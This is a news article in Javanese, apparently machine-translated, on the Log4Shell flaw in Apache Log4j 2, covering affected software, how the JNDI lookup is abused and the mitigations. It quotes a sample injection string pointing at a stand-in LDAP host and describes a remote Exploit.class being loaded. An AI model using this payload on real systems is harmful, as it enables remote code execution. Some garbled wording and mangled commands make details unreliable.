Log4Shell, kerentanan kritis ing Apache Log4j 2 sing mengaruhi akeh proyek Java

darkcrizt | | Dianyari ing | Noticias

Ora komentar

Bubar se ngeculake kabar manawa kerentanan kritis diidentifikasi ing Apache Log4j 2, sing ditondoi minangka kerangka populer kanggo ngatur registri ing aplikasi Jawa, ngidini kode sewenang-wenang dieksekusi nalika nilai format khusus ditulis menyang pendaptaran kanthi format "{jndi: URL}".

Kerentanan Iku kacathet amarga serangan bisa digawa metu ing aplikasi Java singDheweke ngrekam nilai sing dipikolehi saka sumber eksternal, umpamane kanthi nampilake nilai masalah ing pesen kesalahan.

Ditliti yen meh kabeh proyek sing nggunakake kerangka kaya Apache Struts, Apache Solr, Apache Druid utawa Apache Flink kena pengaruh, kalebu Steam, Apple iCloud, klien lan server Minecraft.

Kerentanan kasebut samesthine bakal nyebabake gelombang serangan gedhe ing aplikasi perusahaan, mbaleni riwayat kerentanan kritis ing kerangka kasebut, Apache Struts, yaiku perkiraan kasar sing digunakake ing 65% aplikasi web Fortune 100. Dhaptar aplikasi web perusahaan kalebu upaya sing wis direkam kanggo mindhai jaringan kanggo sistem sing rawan.

Kerentanan ngidini eksekusi remot kode sing ora diakoni. Log4j 2 minangka perpustakaan log Java open source sing dikembangake dening Apache Foundation. Log4j 2 akeh digunakake ing akeh aplikasi lan saiki, minangka ketergantungan, ing akeh layanan. Iki kalebu aplikasi bisnis uga akeh layanan awan.

Tim serangan Randori wis ngembangake eksploitasi fungsional lan wis bisa ngeksploitasi kerentanan iki ing lingkungan pelanggan minangka bagian saka platform keamanan sing nyerang. 

Kerentanan bisa diakses liwat macem-macem metode khusus aplikasi. Pancen, skenario apa wae sing ngidini sambungan remot nyedhiyakake data sewenang-wenang sing ditulis dening aplikasi nggunakake perpustakaan Log4j kanggo log file rentan kanggo eksploitasi. Kerentanan iki kemungkinan banget dieksploitasi ing alam bébas lan bisa uga mengaruhi ewonan organisasi. Kerentanan iki nuduhake risiko nyata sing signifikan kanggo sistem sing kena pengaruh.

Masalah iki ditambah karo kasunyatan sing eksploitasi fungsi wis diterbitake, f.eks.Nanging koreksi kanggo cabang sing stabil durung digawe. Pengenal CVE durung diwenehi. Solusi kasebut mung kalebu ing cabang uji log4j-2.15.0-rc1. Minangka solusi kanggo mblokir kerentanan, disaranake nyetel parameter Log4j2.formatMsgNoLookups dadi bener.

masalah iku amarga kasunyatan sing Log4j 2 ndhukung nangani topeng khusus «{}» ing garis log, ing endi Pitakon JNDI bisa ditindakake (Jawa Jeneng lan Antarmuka Direktori).

Ing nganalisa CVE-2021-44228, Randori nemtokake ing ngisor iki:

Panginstalan gawan saka piranti lunak bisnis sing digunakake akeh rentan.
Kerentanan bisa dimanfaatake kanthi andal lan tanpa otentikasi.
Kerentanan mengaruhi macem-macem versi Log4j 2.
Kerentanan ngidini eksekusi kode remot nalika pangguna mbukak aplikasi nggunakake perpustakaan.

Serangan kasebut mudhun kanggo ngliwati string kanthi substitusi "$ {jndi: ldap: //example.com/a}", sing diproses Log4j 2 bakal ngirim panjalukan LDAP kanggo path menyang kelas Java menyang server attacker.com. . Path sing dibalekake dening server penyerang (contone, http://example.com/Exploit.class) bakal dimuat lan dieksekusi ing konteks proses saiki, ngidini panyerang entuk eksekusi kode sewenang-wenang ing sistem kanthi hak. saka aplikasi saiki.

Pungkasan, kasebut kasebut yen kelainan ditemokake, disaranake sampeyan nganggep iki kedadean aktif, sing wis kompromi, lan nanggapi patut. Nganyarke menyang versi patched saka Log4j 2 utawa aplikasi sing kena pengaruh bakal ngilangi kerentanan iki. Randori nyaranake organisasi apa wae sing dianggep bisa kena pengaruh kanthi cepet nganyarke menyang versi patched.

Ing nganyari paling anyar saka tim Apache Log4j, menehi saran supaya organisasi nindakake ing ngisor iki

  • Nganyari kanggo Log4j 2.15.0
  • Kanggo sing ora bisa nganyarke kanggo 2.15.0: Ing versi> = 2.10, kerentanan iki bisa dikurangi kanthi nyetel properti sistem log4j2.formatMsgNoLookup utawa variabel lingkungan LOG4J_FORMAT_MSG_NO_LOOKUPS dadi bener.
  • Kanggo versi 2,0-beta9 kanggo 2.10.0, mitigasi kanggo mbusak kelas JndiLookup saka classpath: zip -q -d log4j-inti - *. Jar org / apache / logging / log4j / inti / lookup /JndiLookup.class.

sumber: https://www.lunasec.io/


Konten artikel kasebut sesuai karo prinsip kita yaiku etika editorial. Kanggo nglaporake klik kesalahan Kene.

Dadi pisanan komentar

Ninggalake komentar sampeyan

Panjenengan alamat email ora bisa diterbitake. Perangkat kothak ditandhani karo *

*

*

  1. Tanggung jawab data: Miguel Ángel Gatón
  2. Tujuan data: Kontrol SPAM, manajemen komentar.
  3. Legitimasi: idin sampeyan
  4. Komunikasi data: Data kasebut ora bakal dikomunikasikake karo pihak katelu kajaba kanthi kewajiban ukum.
  5. Panyimpenan data: Database sing dianakake dening Occentus Networks (EU)
  6. Hak: Kapan wae sampeyan bisa matesi, mulihake lan mbusak informasi sampeyan.